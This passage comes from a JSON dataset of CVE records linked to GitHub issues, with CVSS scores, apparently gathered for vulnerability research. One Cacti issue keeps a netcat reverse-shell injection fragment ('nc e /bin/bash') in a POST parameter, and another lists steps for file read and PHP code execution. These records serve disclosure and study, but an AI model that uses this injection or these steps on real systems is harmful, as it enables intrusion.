  10161. "description": "Advantages over the native VM module. Hello there :) Just wanted to know if there are clear advantages using vm2 over node's native VM module tried to look for it in the readme but couldnt find anything. I'm using vm on node NUMBERTAG and was wondering if I should potentially look at vm2 if it fixes / handles specific use cases. Cheers!",
  10162. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  10163. "severity": "CRITICAL",
  10164. "baseScore": 10.0,
  10165. "impactScore": 6.0,
  10166. "exploitabilityScore": 3.9
  10167. },
  10168. {
  10169. "CVE_ID": "CVE-2017-16088",
  10170. "Issue_Url_old": "https://github.com/hacksparrow/safe-eval/issues/5",
  10171. "Issue_Url_new": "https://github.com/hacksparrow/safe-eval/issues/5",
  10172. "Repo_new": "hacksparrow/safe-eval",
  10173. "Issue_Created_At": "2017-03-04T00:31:14Z",
  10174. "description": "Security issue: node's VM module doesn't prevent you from accessing the node stdlib. As simple as: APITAG This should be mentioned in the readme, as the VM isn't so safe and people might instead think this prevents any kind of attack :) Ref: URLTAG",
  10175. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  10176. "severity": "CRITICAL",
  10177. "baseScore": 10.0,
  10178. "impactScore": 6.0,
  10179. "exploitabilityScore": 3.9
  10180. },
  10181. {
  10182. "CVE_ID": "CVE-2017-16098",
  10183. "Issue_Url_old": "https://github.com/node-modules/charset/issues/10",
  10184. "Issue_Url_new": "https://github.com/node-modules/charset/issues/10",
  10185. "Repo_new": "node-modules/charset",
  10186. "Issue_Created_At": "2017-09-05T17:52:25Z",
  10187. "description": "Vulnerable Regular Expression. The following regular expression used for parsing the HTTP header is vulnerable to APITAG APITAG The slowdown is moderate: for NUMBERTAG characters around NUMBERTAG seconds matching time. I would suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
  10188. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10189. "severity": "HIGH",
  10190. "baseScore": 7.5,
  10191. "impactScore": 3.6,
  10192. "exploitabilityScore": 3.9
  10193. },
  10194. {
  10195. "CVE_ID": "CVE-2017-16099",
  10196. "Issue_Url_old": "https://github.com/blakeembrey/no-case/issues/17",
  10197. "Issue_Url_new": "https://github.com/blakeembrey/no-case/issues/17",
  10198. "Repo_new": "blakeembrey/no-case",
  10199. "Issue_Created_At": "2017-09-08T08:57:26Z",
  10200. "description": "Vulnerable Regular Expression. The regular expression in FILETAG , used to transform the input string is vulnerable to APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
  10201. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10202. "severity": "HIGH",
  10203. "baseScore": 7.5,
  10204. "impactScore": 3.6,
  10205. "exploitabilityScore": 3.9
  10206. },
  10207. {
  10208. "CVE_ID": "CVE-2017-16100",
  10209. "Issue_Url_old": "https://github.com/skoranga/node-dns-sync/issues/5",
  10210. "Issue_Url_new": "https://github.com/skoranga/node-dns-sync/issues/5",
  10211. "Repo_new": "skoranga/node-dns-sync",
  10212. "Issue_Created_At": "2017-09-05T12:56:04Z",
  10213. "description": "Vulnerable Regular Expression. The following regular expression introduced for validating the hostname is vulnerable to APITAG APITAG The slowdown is very serious: for NUMBERTAG characters around NUMBERTAG seconds matching time. I would suggest one of the following: remove the regex, limit the number of characters that can be matched by the repetition, limit the input size. Moreover, the regular expression allows validation bypassing and hence arbitrary command execution!!! If needed, I can provide an actual example showing the slowdown or the validation bypass.",
  10214. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10215. "severity": "CRITICAL",
  10216. "baseScore": 9.8,
  10217. "impactScore": 5.9,
  10218. "exploitabilityScore": 3.9
  10219. },
  10220. {
  10221. "CVE_ID": "CVE-2017-16113",
  10222. "Issue_Url_old": "https://github.com/get/parsejson/issues/4",
  10223. "Issue_Url_new": "https://github.com/galkn/parsejson/issues/4",
  10224. "Repo_new": "galkn/parsejson",
  10225. "Issue_Created_At": "2017-09-08T09:08:19Z",
  10226. "description": "Vulnerable Regular Expression. The following regular expression used in parsing the JSON file is vulnerable to APITAG APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
  10227. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10228. "severity": "HIGH",
  10229. "baseScore": 7.5,
  10230. "impactScore": 3.6,
  10231. "exploitabilityScore": 3.9
  10232. },
  10233. {
  10234. "CVE_ID": "CVE-2017-16114",
  10235. "Issue_Url_old": "https://github.com/chjj/marked/issues/937",
  10236. "Issue_Url_new": "https://github.com/markedjs/marked/issues/937",
  10237. "Repo_new": "markedjs/marked",
  10238. "Issue_Created_At": "2017-09-07T13:35:28Z",
  10239. "description": "Vulnerable Regular Expression. The following regular expression used in parsing the input markdown content is vulnerable to APITAG APITAG The slowdown is very serious (for NUMBERTAG characters around NUMBERTAG seconds matching time). I would suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
  10240. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10241. "severity": "HIGH",
  10242. "baseScore": 7.5,
  10243. "impactScore": 3.6,
  10244. "exploitabilityScore": 3.9
  10245. },
  10246. {
  10247. "CVE_ID": "CVE-2017-16115",
  10248. "Issue_Url_old": "https://github.com/indexzero/TimeSpan.js/issues/10",
  10249. "Issue_Url_new": "https://github.com/indexzero/timespan.js/issues/10",
  10250. "Repo_new": "indexzero/timespan.js",
  10251. "Issue_Created_At": "2017-09-07T09:43:18Z",
  10252. "description": "Vulnerable Regular Expressions. The following regular expressions used for parsing the dates are vulnerable to APITAG APITAG The slowdown is relatively large when combining the slowdown produced by all the regexes (for NUMBERTAG characters around NUMBERTAG seconds matching time). I would suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
  10253. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10254. "severity": "HIGH",
  10255. "baseScore": 7.5,
  10256. "impactScore": 3.6,
  10257. "exploitabilityScore": 3.9
  10258. },
  10259. {
  10260. "CVE_ID": "CVE-2017-16116",
  10261. "Issue_Url_old": "https://github.com/jprichardson/string.js/issues/212",
  10262. "Issue_Url_new": "https://github.com/jprichardson/string.js/issues/212",
  10263. "Repo_new": "jprichardson/string.js",
  10264. "Issue_Created_At": "2017-09-06T14:45:41Z",
  10265. "description": "Vulnerable Regular Expressions. The following regular expressions used in underscore and APITAG methods are vulnerable to APITAG APITAG The slowdown is moderately low (for NUMBERTAG characters around NUMBERTAG seconds matching time). I would suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
  10266. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10267. "severity": "HIGH",
  10268. "baseScore": 7.5,
  10269. "impactScore": 3.6,
  10270. "exploitabilityScore": 3.9
  10271. },
  10272. {
  10273. "CVE_ID": "CVE-2017-16117",
  10274. "Issue_Url_old": "https://github.com/dodo/node-slug/issues/82",
  10275. "Issue_Url_new": "https://github.com/dodo/node-slug/issues/82",
  10276. "Repo_new": "dodo/node-slug",
  10277. "Issue_Created_At": "2017-09-06T14:08:19Z",
  10278. "description": "Vulnerable Regular Expression. The following regular expression used in parsing the input string is vulnerable to APITAG APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
  10279. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10280. "severity": "HIGH",
  10281. "baseScore": 7.5,
  10282. "impactScore": 3.6,
  10283. "exploitabilityScore": 3.9
  10284. },
  10285. {
  10286. "CVE_ID": "CVE-2017-16129",
  10287. "Issue_Url_old": "https://github.com/visionmedia/superagent/issues/1259",
  10288. "Issue_Url_new": "https://github.com/ladjs/superagent/issues/1259",
  10289. "Repo_new": "ladjs/superagent",
  10290. "Issue_Created_At": "2017-08-07T17:15:56Z",
  10291. "description": "Limit maximum response size. Superagent buffers and uncompresses responses in memory. Malicious server could send extremely large response causing superagent to use excessive amounts of memory. I suggest adding a way to set a maximum response size, and have a default limit set.",
  10292. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10293. "severity": "MEDIUM",
  10294. "baseScore": 5.9,
  10295. "impactScore": 3.6,
  10296. "exploitabilityScore": 2.2
  10297. },
  10298. {
  10299. "CVE_ID": "CVE-2017-16137",
  10300. "Issue_Url_old": "https://github.com/visionmedia/debug/issues/501",
  10301. "Issue_Url_new": "https://github.com/debug-js/debug/issues/501",
  10302. "Repo_new": "debug-js/debug",
  10303. "Issue_Created_At": "2017-09-05T11:59:41Z",
  10304. "description": "Vulnerable Regular Expression. The following regular expression used in the \"o\" formatter is vulnerable to APITAG APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
  10305. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  10306. "severity": "MEDIUM",
  10307. "baseScore": 5.3,
  10308. "impactScore": 1.4,
  10309. "exploitabilityScore": 3.9
  10310. },
  10311. {
  10312. "CVE_ID": "CVE-2017-16138",
  10313. "Issue_Url_old": "https://github.com/broofa/node-mime/issues/167",
  10314. "Issue_Url_new": "https://github.com/broofa/mime/issues/167",
  10315. "Repo_new": "broofa/mime",
  10316. "Issue_Created_At": "2017-09-05T12:20:24Z",
  10317. "description": "Vulnerable Regular Expression. The following regular expression used in the mime lookup is vulnerable to APITAG APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
  10318. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10319. "severity": "HIGH",
  10320. "baseScore": 7.5,
  10321. "impactScore": 3.6,
  10322. "exploitabilityScore": 3.9
  10323. },
  10324. {
  10325. "CVE_ID": "CVE-2017-16229",
  10326. "Issue_Url_old": "https://github.com/ohler55/ox/issues/195",
  10327. "Issue_Url_new": "https://github.com/ohler55/ox/issues/195",
  10328. "Repo_new": "ohler55/ox",
  10329. "Issue_Created_At": "2017-10-29T22:44:33Z",
  10330. "description": "Stack buffer overlfow. Tested on ruby NUMBERTAG POC crash ( APITAG ): CODETAG Input file that causes the crash: URLTAG Launch: APITAG Output: ERRORTAG Backtrace: ERRORTAG Output with APITAG (ASAN): ERRORTAG",
  10331. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10332. "severity": "MEDIUM",
  10333. "baseScore": 5.5,
  10334. "impactScore": 3.6,
  10335. "exploitabilityScore": 1.8
  10336. },
  10337. {
  10338. "CVE_ID": "CVE-2017-16357",
  10339. "Issue_Url_old": "https://github.com/radare/radare2/issues/8742",
  10340. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8742",
  10341. "Repo_new": "radareorg/radare2",
  10342. "Issue_Created_At": "2017-10-26T03:52:15Z",
  10343. "description": "Memory corruption on NUMBERTAG bit system. A memory corruption issue was found in radare2 on NUMBERTAG bit linux system when handling crafted ELF file. Build information: CODETAG Backtrace: ERRORTAG Enviroment: ERRORTAG A POC file has been attached to reproduce this issue. FILETAG",
  10344. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  10345. "severity": "HIGH",
  10346. "baseScore": 7.8,
  10347. "impactScore": 5.9,
  10348. "exploitabilityScore": 1.8
  10349. },
  10350. {
  10351. "CVE_ID": "CVE-2017-16358",
  10352. "Issue_Url_old": "https://github.com/radare/radare2/issues/8748",
  10353. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8748",
  10354. "Repo_new": "radareorg/radare2",
  10355. "Issue_Created_At": "2017-10-27T06:59:04Z",
  10356. "description": "Address sanitizer reports heap buffer overflow on NUMBERTAG bit linux system. Address sanitizer reports heap buffer overflow on NUMBERTAG bit linux system when radare2 handles crafted data. My enviroment: ERRORTAG Radare2 build information: CODETAG ASAN reports on heap buffer overflow: ERRORTAG",
  10357. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  10358. "severity": "HIGH",
  10359. "baseScore": 7.8,
  10360. "impactScore": 5.9,
  10361. "exploitabilityScore": 1.8
  10362. },
  10363. {
  10364. "CVE_ID": "CVE-2017-16359",
  10365. "Issue_Url_old": "https://github.com/radare/radare2/issues/8764",
  10366. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8764",
  10367. "Repo_new": "radareorg/radare2",
  10368. "Issue_Created_At": "2017-10-31T12:01:14Z",
  10369. "description": "Crash in ELF version parse. This issue looks like NUMBERTAG but it should be a different one. ERRORTAG Build information and enviroment: ERRORTAG",
  10370. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10371. "severity": "MEDIUM",
  10372. "baseScore": 5.5,
  10373. "impactScore": 3.6,
  10374. "exploitabilityScore": 1.8
  10375. },
  10376. {
  10377. "CVE_ID": "CVE-2017-16516",
  10378. "Issue_Url_old": "https://github.com/brianmario/yajl-ruby/issues/176",
  10379. "Issue_Url_new": "https://github.com/brianmario/yajl-ruby/issues/176",
  10380. "Repo_new": "brianmario/yajl-ruby",
  10381. "Issue_Created_At": "2017-11-02T02:22:45Z",
  10382. "description": "SIGABRT process aborted. APITAG APITAG File passed as input: APITAG Output: ERRORTAG",
  10383. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10384. "severity": "HIGH",
  10385. "baseScore": 7.5,
  10386. "impactScore": 3.6,
  10387. "exploitabilityScore": 3.9
  10388. },
  10389. {
  10390. "CVE_ID": "CVE-2017-16546",
  10391. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/851",
  10392. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/851",
  10393. "Repo_new": "imagemagick/imagemagick",
  10394. "Issue_Created_At": "2017-11-04T06:27:48Z",
  10395. "description": "Heap Allocation errors, uninitialized integers used to allocate memory as well as conditional jumps depending on uninitialized values, while feeding a malformed WPG File. Description There seems to be a number of heap Allocation errors, uninitialized integers used to allocate memory as well as conditional jumps depending on uninitialized values, while running a verbose identify on a malformed image file. All of these conditions can be triggered by using a single WPG file. Steps to Reproduce This occurs while running ./magick identify verbose %file% on a malformed WPG file. FILETAG The hexdump of the input file is: CODETAG The Memcheck output is huge, I'm sharing it as a txt file attached with the report. FILETAG However some of the relevant parts are: ERRORTAG ERRORTAG ERRORTAG System Configuration Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC Delegates (built in): OS: Ubuntu NUMBERTAG Compiler: clang version NUMBERTAG PATHTAG ) / gcc version NUMBERTAG APITAG NUMBERTAG ubuntu3) Target NUMBERTAG pc linux gnu",
  10396. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  10397. "severity": "HIGH",
  10398. "baseScore": 8.8,
  10399. "impactScore": 5.9,
  10400. "exploitabilityScore": 2.8
  10401. },
  10402. {
  10403. "CVE_ID": "CVE-2017-16615",
  10404. "Issue_Url_old": "https://github.com/thanethomson/MLAlchemy/issues/1",
  10405. "Issue_Url_new": "https://github.com/thanethomson/mlalchemy/issues/1",
  10406. "Repo_new": "thanethomson/mlalchemy",
  10407. "Issue_Created_At": "2017-11-07T08:26:15Z",
  10408. "description": "parse_yaml_query method is vulnerable. from mlalchemy import parse_yaml_query parse_yaml_query( PATHTAG APITAG Hi, there is a vulnerability in parse_yaml_query method in parser.py, please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
  10409. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10410. "severity": "CRITICAL",
  10411. "baseScore": 9.8,
  10412. "impactScore": 5.9,
  10413. "exploitabilityScore": 3.9
  10414. },
  10415. {
  10416. "CVE_ID": "CVE-2017-16616",
  10417. "Issue_Url_old": "https://github.com/Stranger6667/pyanyapi/issues/41",
  10418. "Issue_Url_new": "https://github.com/stranger6667/pyanyapi/issues/41",
  10419. "Repo_new": "stranger6667/pyanyapi",
  10420. "Issue_Created_At": "2017-11-07T08:31:08Z",
  10421. "description": "APITAG method is vulnerable . from pyanyapi import APITAG APITAG 'container > APITAG PATHTAG APITAG Hi, there is a vulnerability in APITAG method in Interfaces.py, please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
  10422. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10423. "severity": "CRITICAL",
  10424. "baseScore": 9.8,
  10425. "impactScore": 5.9,
  10426. "exploitabilityScore": 3.9
  10427. },
  10428. {
  10429. "CVE_ID": "CVE-2017-16618",
  10430. "Issue_Url_old": "https://github.com/tadashi-aikawa/owlmixin/issues/12",
  10431. "Issue_Url_new": "https://github.com/tadashi-aikawa/owlmixin/issues/12",
  10432. "Repo_new": "tadashi-aikawa/owlmixin",
  10433. "Issue_Created_At": "2017-11-07T08:28:51Z",
  10434. "description": "load_yaml and load_yamlf methods is vulnerable. from owlmixin import util APITAG PATHTAG APITAG APITAG NUMBERTAG PATHTAG APITAG Hi, there is a vulnerability in load_yaml and load_yamlf methods in util.py, please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
  10435. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10436. "severity": "CRITICAL",
  10437. "baseScore": 9.8,
  10438. "impactScore": 5.9,
  10439. "exploitabilityScore": 3.9
  10440. },
  10441. {
  10442. "CVE_ID": "CVE-2017-16641",
  10443. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/1057",
  10444. "Issue_Url_new": "https://github.com/cacti/cacti/issues/1057",
  10445. "Repo_new": "cacti/cacti",
  10446. "Issue_Created_At": "2017-11-01T19:38:32Z",
  10447. "description": "Critical vuln in cacti NUMBERTAG We (worlak2 and cibvetr2) found RCE vuln with black box fuzzing. APITAG APITAG in POST parameter path_rrdtool > _ nc e /bin/bash APITAG NUMBERTAG FILETAG NUMBERTAG Ater NUMBERTAG minutes we have backconnect shell FILETAG It\u2019s triggered after execute FILETAG in process. We think that because _$command_ not filtered in PATHTAG With regards worlak2 and cibvetr2",
  10448. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  10449. "severity": "HIGH",
  10450. "baseScore": 7.2,
  10451. "impactScore": 5.9,
  10452. "exploitabilityScore": 1.2
  10453. },
  10454. {
  10455. "CVE_ID": "CVE-2017-16651",
  10456. "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/6026",
  10457. "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/6026",
  10458. "Repo_new": "roundcube/roundcubemail",
  10459. "Issue_Created_At": "2017-11-06T10:45:29Z",
  10460. "description": "File Disclosure Vulnerability. There is a zero day file disclosure vulnerability in the latest version of roundcube webmail which currently is being exploited by hackers to read roundcube's configuration files and steal its database credentials. It requires a valid username/password to login to a roundcube installation. I don't know how exactly should I report the details of this bug. Is there a proper way to privately send the details to roundcube's developers? Can I send the details to hello(at)roundcube(dot)net?",
  10461. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  10462. "severity": "HIGH",
  10463. "baseScore": 7.8,
  10464. "impactScore": 5.9,
  10465. "exploitabilityScore": 1.8
  10466. },
  10467. {
  10468. "CVE_ID": "CVE-2017-16660",
  10469. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/1066",
  10470. "Issue_Url_new": "https://github.com/cacti/cacti/issues/1066",
  10471. "Repo_new": "cacti/cacti",
  10472. "Issue_Created_At": "2017-11-07T03:49:22Z",
  10473. "description": "Local File Read and RCE in Cacti NUMBERTAG ds NUMBERTAG It requires admin privileges to reproduce the ploblem. After we login in with default account APITAG Local File Read NUMBERTAG Click Settings APITAG URLTAG URLTAG ,modify Cacti Log Path into APITAG NUMBERTAG isit URLTAG URLTAG , and you'll get the content of APITAG RCE NUMBERTAG Click Settings APITAG URLTAG URLTAG ,modify Cacti Log Path into Web Path like APITAG NUMBERTAG isit FILETAG and set http header APITAG into APITAG . Or exec cmd APITAG . The evil php code will been writen to PATHTAG",
  10474. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  10475. "severity": "HIGH",
  10476. "baseScore": 7.2,
  10477. "impactScore": 5.9,
  10478. "exploitabilityScore": 1.2
  10479. },
  10480. {
  10481. "CVE_ID": "CVE-2017-16663",
  10482. "Issue_Url_old": "https://github.com/pts/sam2p/issues/16",
  10483. "Issue_Url_new": "https://github.com/pts/sam2p/issues/16",
  10484. "Repo_new": "pts/sam2p",
  10485. "Issue_Created_At": "2017-11-07T13:56:06Z",
  10486. "description": "Integer Overflow in input bmp.ci. I found an integer overflow bug in input bmp.ci. in function APITAG URLTAG width height NUMBERTAG sizeof (unsigned char) would integer overflow there are NUMBERTAG places hace this problem: URLTAG URLTAG URLTAG here are the pocs which could crash sam2p: URLTAG URLTAG and screenshot for ASAN: URLTAG URLTAG patch method: check width height NUMBERTAG sizeof (unsigned char) before calc it",
  10487. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10488. "severity": "MEDIUM",
  10489. "baseScore": 5.5,
  10490. "impactScore": 3.6,
  10491. "exploitabilityScore": 1.8
  10492. },
  10493. {
  10494. "CVE_ID": "CVE-2017-16667",
  10495. "Issue_Url_old": "https://github.com/bit-team/backintime/issues/834",
  10496. "Issue_Url_new": "https://github.com/bit-team/backintime/issues/834",
  10497. "Repo_new": "bit-team/backintime",
  10498. "Issue_Created_At": "2017-11-07T18:22:38Z",
  10499. "description": "Some 'notify send' arguments (filepath in errors/warnings) are treated as shell arguments. Backintime NUMBERTAG APITAG stable) Hi, this is a bug I noticed when trying to backup a file my user didn't have read permissions on. Normally a desktop notification ( FILETAG would be displayed containing the path of the problematic file. However in some cases, parts of the log message are treated as shell commands. For example ERRORTAG Other errors also trigger this bug (example with a filesystem error:) ERRORTAG",
  10500. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  10501. "severity": "HIGH",
  10502. "baseScore": 7.8,
  10503. "impactScore": 5.9,
  10504. "exploitabilityScore": 1.8
  10505. },
  10506. {
  10507. "CVE_ID": "CVE-2017-16711",
  10508. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/46",
  10509. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/46",
  10510. "Repo_new": "matthiaskramm/swftools",
  10511. "Issue_Created_At": "2017-11-09T12:44:31Z",
  10512. "description": "A null pointer dereference bug of swfrender. A null pointer dereference bug of swfrender poc: URLTAG asan: URLTAG the problem is in the function uncompress URLTAG when function uncompress failed, this function will return NUMBERTAG URLTAG so the APITAG will return NUMBERTAG URLTAG data will be a NULL when construct it. void data = APITAG &width, &height); After that, gfximage_new will make a new struct in which the data is a NULL pointer. it caused a NULL pointer reference when calling fill_line_bitmap URLTAG",
  10513. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10514. "severity": "MEDIUM",
  10515. "baseScore": 5.5,
  10516. "impactScore": 3.6,
  10517. "exploitabilityScore": 1.8
  10518. },
  10519. {
  10520. "CVE_ID": "CVE-2017-16762",
  10521. "Issue_Url_old": "https://github.com/channelcat/sanic/issues/633",
  10522. "Issue_Url_new": "https://github.com/sanic-org/sanic/issues/633",
  10523. "Repo_new": "sanic-org/sanic",
  10524. "Issue_Created_At": "2017-04-13T18:16:26Z",
  10525. "description": "static file register arbitrary file read. File APITAG line NUMBERTAG we can see here is security check CODETAG but at the line NUMBERTAG in this file,the unquote function decoded file_path ERRORTAG we only need to \"/\" url coding can bypass the previous security check like this: FILETAG example of vulnerabilities: CODETAG",
  10526. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  10527. "severity": "HIGH",
  10528. "baseScore": 7.5,
  10529. "impactScore": 3.6,
  10530. "exploitabilityScore": 3.9
  10531. },
  10532. {
  10533. "CVE_ID": "CVE-2017-16763",
  10534. "Issue_Url_old": "https://github.com/bbengfort/confire/issues/24",
  10535. "Issue_Url_new": "https://github.com/bbengfort/confire/issues/24",
  10536. "Repo_new": "bbengfort/confire",
  10537. "Issue_Created_At": "2017-11-10T01:52:48Z",
  10538. "description": "APITAG method in class Configuration is vulnerable. class APITAG mysetting = True logpath = PATHTAG appname = APITAG settings = APITAG CONF_PATHS = [ PATHTAG The global configuration APITAG User specific configuration APITAG Local directory configuration ] PATHTAG APITAG Hi, there is a vulnerability in APITAG method in config.py, please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
  10539. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10540. "severity": "CRITICAL",
  10541. "baseScore": 9.8,
  10542. "impactScore": 5.9,
  10543. "exploitabilityScore": 3.9
  10544. },
  10545. {
  10546. "CVE_ID": "CVE-2017-16764",
  10547. "Issue_Url_old": "https://github.com/illagrenan/django-make-app/issues/5",
  10548. "Issue_Url_new": "https://github.com/illagrenan/django-make-app/issues/5",
  10549. "Repo_new": "illagrenan/django-make-app",
  10550. "Issue_Created_At": "2017-11-10T02:25:54Z",
  10551. "description": "read_yaml_file method is vulnerable. from APITAG import read_yaml_file yaml_raw_data = APITAG PATHTAG APITAG Hi, there is a vulnerability in read_yaml_file methods in io_utils.py, please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
  10552. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10553. "severity": "CRITICAL",
  10554. "baseScore": 9.8,
  10555. "impactScore": 5.9,
  10556. "exploitabilityScore": 3.9
  10557. },
  10558. {
  10559. "CVE_ID": "CVE-2017-16785",
  10560. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/1071",
  10561. "Issue_Url_new": "https://github.com/cacti/cacti/issues/1071",
  10562. "Repo_new": "cacti/cacti",
  10563. "Issue_Created_At": "2017-11-10T11:22:40Z",
  10564. "description": "Reflected XSS in NUMBERTAG We (worlak2 and cibvetr2) found Reflected XSS vuln in last version APITAG example we found in Google host with last version of cacti) APITAG NUMBERTAG URLTAG",
  10565. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  10566. "severity": "MEDIUM",
  10567. "baseScore": 6.1,
  10568. "impactScore": 2.7,
  10569. "exploitabilityScore": 2.8
  10570. },
  10571. {
  10572. "CVE_ID": "CVE-2017-16793",
  10573. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/47",
  10574. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/47",
  10575. "Repo_new": "matthiaskramm/swftools",
  10576. "Issue_Created_At": "2017-11-10T13:04:12Z",
  10577. "description": "A heapoverflow bug of wa NUMBERTAG swf.. A heapoverflow bug of wa NUMBERTAG swf. poc: URLTAG asan: URLTAG Bug occured in file APITAG Function wav_convert2mono does not check the size and align in wav sample properly, which causes samplelen equal to NUMBERTAG while size less than align. URLTAG Thus, the argument to the function malloc will less than we expect, which is only NUMBERTAG bytes. URLTAG Later, in the for loop, it will cause heap buffer overflow. Here the varible src >size is NUMBERTAG b NUMBERTAG a, which makes pos2 much more larger than NUMBERTAG URLTAG Patch Suggestion: Check size and align.",
  10578. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  10579. "severity": "HIGH",
  10580. "baseScore": 7.8,
  10581. "impactScore": 5.9,
  10582. "exploitabilityScore": 1.8
  10583. },
  10584. {
  10585. "CVE_ID": "CVE-2017-16794",
  10586. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/50",
  10587. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/50",
  10588. "Repo_new": "matthiaskramm/swftools",
  10589. "Issue_Created_At": "2017-11-10T16:22:47Z",
  10590. "description": "A heapoverflow bug of png2swf.. A heapoverflow bug of png2swf. poc: URLTAG asan: URLTAG png_read_header parameter a is a char type, and header >bpp is an int type when a is NUMBERTAG the header >app will become NUMBERTAG ffffff NUMBERTAG by the evaluate operation URLTAG when using bpp, the pos will become a really big number, which caused the heap overflow URLTAG",
